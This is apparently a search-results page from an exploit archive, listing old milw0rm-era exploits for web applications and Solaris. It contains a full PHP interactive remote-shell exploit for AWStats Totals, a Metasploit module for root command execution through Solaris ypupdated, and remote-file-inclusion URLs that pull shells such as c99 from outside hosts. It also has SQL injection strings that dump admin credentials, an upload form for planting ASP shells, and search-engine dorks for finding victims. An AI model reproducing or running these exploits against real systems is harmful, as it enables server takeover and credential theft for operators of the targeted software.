remote shell
Search result for 'remote shell'
(0.0262551307678 seconds)
Ricardo Almeida/AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit ( php)
<?php
/*
* Remote Execution Exploit for AWStats Totals vulnerability (Interactive Shell) Version 2
*
* Updated 05/09/08: The exploit now works with magic quotes on or off
*
* Author: Ricardo Almeida
* email: ricardojba[at]aeiou[DoT]pt
*
* Greetz
* The hacker webzine authored by Ronald van den Heetkamp for his code
*
* Credits: Vulnerabilities reported by Emory University.
* http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt
*
*/
function wrap($url){
$ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
$op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');
$agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';
# tor or other proxy
$tor = '172.20.1.15:8080';
$timeout = '300';
$ack = curl_init();
curl_setopt ($ack, CURLOPT_PROXY, $tor);
curl_setopt ($ack, CURLOPT_URL, $url);
curl_setopt ($ack, CURLOPT_HEADER, 1);
curl_setopt ($ack, CURLOPT_USERAGENT, $agent);
curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);
$syn = curl_exec($ack);
$info = curl_getinfo($ack);
curl_close($ack);
if($info['http_code'] == '200') {
return $syn;
die();
} else {
return "Fail! :".$info['http_code']."\r\n";
}
}
if ($argc != 3) {die("Usage: awtotalhack.php <host> <magic_quotes on or off>\nEx: awtotalhack.php host.tld on\n");}
array_shift($argv);
$host = $argv[0];
$magic = $argv[1];
# Start the interactive shell
while(1){
fwrite(STDOUT, "[shell:~ # ");
if ($magic == "on") {
$c = str_split(trim(fgets(STDIN)));
if (implode($c) == "exit") {die();};
for($i=0;$i<count($c);$i++) {$c[$i] = "chr(".ord($c[$i]).")";}
$cmd = implode("%2e", $c);
$attackurl = "http://".$host."/"."awstatstotals.php?sort=%7b%24%7bpassthru%28".$cmd."%29%7d%7d%7b%24%7bexit%28%29%7d%7d";
echo wrap($attackurl);
} else if ($magic == "off") {
$cmd = preg_replace('/ /','%20',trim(fgets(STDIN)));
if ($cmd == "exit") {die();};
$attackurl = "http://".$host."/"."awstatstotals.php?sort=%22%5d%2epassthru%28%27".$cmd."%27%29%2eexit%28%29%2e%24a%5b%22";
echo wrap($attackurl);
}
}
?>
# milw0rm.com [2008-09-05]
GoLd_M/Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities ( php)
###################################################### # Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities # D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz # Discovered by: GloD_M = [Mahmood_ali] # Homepage: http://www.Tryag.cc # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group ###################################################### # V.Code Include: # # <?include $CssFile;?> # # Exploit Remote File Include: # # [Path_Philex]/header.inc.php?CssFile=Shell # ###################################################### # V.Code Disclosure: # # readfile($HTTP_GET_VARS["file"]); # # Exploit Remote File Disclosure: # # [Path_Philex]/download.php?file=conf.inc.php # ###################################################### # milw0rm.com [2007-03-23]
eidelweiss/PHPIDS 0.4 - Remote File Inclusion Vulnerability ( php)
###########################################################
### #
### PHPIDS 0.4 - Remote File Inclusion Vulnerability #
### #
###########################################################
###
### * @package PHPIDS
### * @Version 0.4
### * @license http://www.gnu.org/licenses/lgpl.html LGP
### * @link http://php-ids.org/
###
###########################################################
###
### Type : Remote File Inclusion Vulnerability
### Author: eidelweiss
### Date : 2010-02-08
### Location: Indonesia ( http://yogyacarderlink.web.id )
### Contact: g1xsystem [at] windowslive [dot] com
###
###########################################################
###
### Vuln: require_once 'IDS/Init.php'
###
### if (version_compare(phpversion(), '5.1.6', '>=')) {
### set_include_path (
### get_include_path()
### . PATH_SEPARATOR
### . BX_DIRECTORY_PATH_PLUGINS . 'phpids/'
###
### include_once 'IDS/Monitor.php';
### include_once 'IDS/Filter/Storage.php';
### if ($configPath) {
### $this->setConfigPath($configPath);
### $this->config = parse_ini_file($this->configPath, true);
### =========================================================
### Exploit: http://victim.com/[PHPIDS_path]/IDS/Init.php?path=[Shell.txt?]
###########################################################
### #
### Greetz : AL-MARHUM - YOGYACARDERLINK TEAM - (D)eal(C)yber #
### #
###########################################################
CraCkEr/Dagger CMS 2008 (dir_inc) Remote File Inclusion Vulnerability ( php)
???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Remote File Include ] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : uNiTeD CraCkiNg ForCE ? ? ?
? Script : Dagger CMS ? ? Register Globals : ?
? Download : SourceForge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
http://localhost/path/skins/default.php?dir_inc=[SHELL]
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
??????????????????????????????????????????????????????????????????????????????
?? © CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# milw0rm.com [2008-06-23]
CraCkEr/ODARS CMS 1.0.2 Remote File Inclusion Vulnerability ( php)
???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Remote File Include ] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : uNiTeD CraCkiNg ForCE ? ? ?
? Script : ODARS CMS 1.0.2 ? ? Register Globals : ?
? Download : SourceForge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
http://localhost/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL]
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
??????????????????????????????????????????????????????????????????????????????
?? © CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# milw0rm.com [2008-06-22]
S.W.A.T./phpMytourney (menu.php) Remote File Inclusion Vulnerability ( php)
******************************************************************************* # Title : phpMytourney (functions_file) Remote File Inclusion Vulnerability # Author : S.W.A.T. # Contact : S.W.4.T@HackerMail.com # S.Page : http://script.vanta.ru/download.php?id=1178&clas=0 # $$ : Free # Site : Http://www.XmorS-Security.CoM - Http://www.xmors.com - Http://www.xmors.net ******************************************************************************* Vuln Code: include($functions_file); [[Remote]]] http://[target]/[path]/menu.php?functions_file=[SHELL] """"""""""""""""""""" # I Love XmorsTEAM # We Are: Scorpiunix - KAMY4r - D3vil_boy_ir - Sh3llH3ll - The_Edit0r - S.W.A.T. # Iranian Hackers & Security TEAM # Xmors Digital Network Hacking & Security Team # milw0rm.com [2007-09-06]
I)ruid/Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta) ( solaris)
____ ____ __ __
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/========================================================
Exploit ID: CAU-EX-2008-0001
Release Date: 2008.04.04
Title: ypupdated_exec.rb
Description: Solaris ypupdated Command Execution
Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email: I)ruid <druid (@) caughq.org>
===============/========================================================
Description
===========
This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request. Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|<command>'.
Credits
=======
Josh D. <mcpheea@cadvision.com> from Avalon Security Research is
credited with originally discovering this vulnerability.
This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.
References
==========
http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
http://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282
Metasploit
==========
require 'msf/core'
module Msf
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
include Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <druid@caughq.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
['BID', '1749'],
['CVE', '1999-0209'],
['OSVDB', '11517'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
end
# milw0rm.com [2008-04-04]
ZxH-Labs/Islam Sound IV2 (details.php) Remote SQL Injection ( php)
# Lab : ZxH-Lab's # Locate : Jordan - Amman City # Exploit Title : Islam Sound IV2 (details.php) Remote SQL Injection # Date : 2-2-2011 # Author : ZxH-Labs # HomeScript : http://www.emides.com/ # Version : 2.0 # Tested On : Windows Server 2003 [IIS] ==================================================== # http://www.site.org/details.php?linkid=[SQL Codes] # http://www.site.org/details.php?linkid=-68+and+1=2+union+select+1,2,3,4,5,6,7,8,9-- ==================================================== Greet'z 2 Jiko | SadHaCKEr | T0RoB0xHaCKEr | Cyb3r-DevIL | Tw1sT3r | X-Shadow | FreeMAN | Evil SheLL | Sec4ever | Jago-Dz Special Thanks 2 AtT4CKxT3rR0rIsT | OSSI Sepcial Fuck [ _!_ ] 2 Root-Ar.CoM
LoSt.HaCkEr/FCMS 2.2.3 Remote File Inclusion Vulnerability ( php)
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ] [x] Date: 10-9-2010] [x] Author: LoSt.HaCkEr ~ aDaM_TRoJaN [x] Software Link: [http://www.familycms.com/getstarted.php] [x] Version: [v 2.2.3 ] [x]Tested on: [Windows XP] [x] CVE : [x] My E-MaIl:LoSt.HaCkEr[at]HaCkEr[dot]Ps ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/familynews.php?current_user_id=[shell] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [x]Greetings: No Greet
HaCkEr arar/PHP Chat for 123 Flash Chat Remote File Inclusion Vulnerability ( php)
*# Exploit Title: php_chat Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: HaCkEr arar
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home:
http://www.opensourcescripts.com/dir/PHP/Chat/php_chat_module_for123_flash_chat_4902.html
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
# ViRuS Qalaa: em9@live.com
:::::::::::::::::::::::::
=================Exploit=================
-=[ vuln c0de ]=-
include('db/'.$select_db.'.php');
login_chat.php
Line:41
----exploit----
http://{localhost}/{path}login_chat.php?select_db=shell.txt?
---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0,Members www.j1q1.com
and My friends Others and My friends in MSN
EnJoY o_O*
cr4wl3r/phptraverse <= 0.8.0 Remote File Inclusion Vulnerability ( php)
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#phptraverse <= 0.8.0 Remote File Include Vulnerability
#Download Script : http://sourceforge.net/projects/phptraverse/files/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./phptraverse-0.8.0/assets/plugins/mp3_id/mp3_id.php (line 32)
# <?php
# include_once $GLOBALS['BASE'].'/PEAR/PEAR.php';
# ?>
#PoC : http://server/[path]/assets/plugins/mp3_id/mp3_id.php?GLOBALS[BASE]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################
#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,
# dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*
########################################################################
/##############################################\
# all member at sekuritionline.net #
# all member at manadocoding.net #
\##############################################/
[ Gorontalo / 2009 ]
ThE X-HaCkEr/Creator CMS 5.0 (sideid) Remote SQL Injection Vulnerability ( asp)
# Exploit : Creator CMS 5.0 Remote SQL Injection Vulnerability # # Vendor : www.cmind.dk # # Founded By : ThE X-HaCkEr From X9 Team ( ThE X-HaCkEr & dr.9) # # Greetz To : tryag.cc & saudihack.com & hackteach.org all muslim # # Email : the-x-hacker[@]hotmail[.]fr # # Google D0rk : allinurl:index.asp?sideid= POC : www.site.com/index.asp?sideid=[SQL] SQL : 1+union+select+concat(username,0x3a,password),2,3+from+login/* Example : http://www.xxx.dk/index.asp?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/* You can upload an asp shell through file manager Enjoy !!! # milw0rm.com [2008-09-09]
Alemin_Krali/AspWebCalendar 2008 Remote File Upload Vulnerability ( php)
Title:AspWebCalendar 2008 Remote File Upload Vulnerability # Discovered by : Alemin_Krali # Dork :calendar.asp?eventdetail http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address upload form <FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P> Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed # milw0rm.com [2008-06-18]
RoMaNcYxHaCkEr/Cyberfolio 7.12 (rep) Remote File Inclusion Vulnerability ( php)
-==========================================[ ViVa Islam + YeMeN ]====================================- # Name : cyberfolio 7.2 Remote File Include Vulnerabiliy # Download From : http://cyberfolio.org/sources/version7.10/cyberfolio_7_12.zip # Found By : RoMaNcYxHaCkEr [RoMaNTiC-TeaM] ( BlackxHat , BlackBox , aLwHEeD ) # Home Page : www.4rxh.com & www.nb3.cc +======================================================================================================================+ # Exploits : http://WwW.4RxH.CoM/cyberfolio_7_12/portfolio/commentaires/derniers_commentaires.php?rep=http://rxh.freehostia.com/shells/c99in.txt? That,s It,s Good Luck Everybody +=======================================================================================================================+ # Greet To : Tryag TeaM & All Members Of My Forum & Anyone Hate Me :) # For Contact : webmaster@4rxh.com # bEST wISHES -==========================================[ ViVa Islam + YeMeN ]====================================- # milw0rm.com [2008-05-08]
His0k4/Smartblog (index.php tid) Remote SQL Injection Vulnerability ( php)
###################################################
[~] Smartblog remote SQL injection exploit
[~] Script download : http://ftp1.toocharger.com/scfQ9NS/smartblog_3868.zip
[~] Founder: His0k4 { ALGERIAN HACKER }
[~] Greetz : All friends & muslims HaCkErS...
[~] Contact: His0k4.hlm[at]gmail.com
[~] Dork : Actionnée par smartblog
[~] P.O.C :
---------------------
http://localhost/[script_path]/index.php?idt={SQL}
[~] Exemple :
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
---------------------
[~] Note:
Admin http://localhost/[script_path]/?page=login.html
You can upload a shell from the admin panel
---------------------
###############################################
# milw0rm.com [2008-05-03]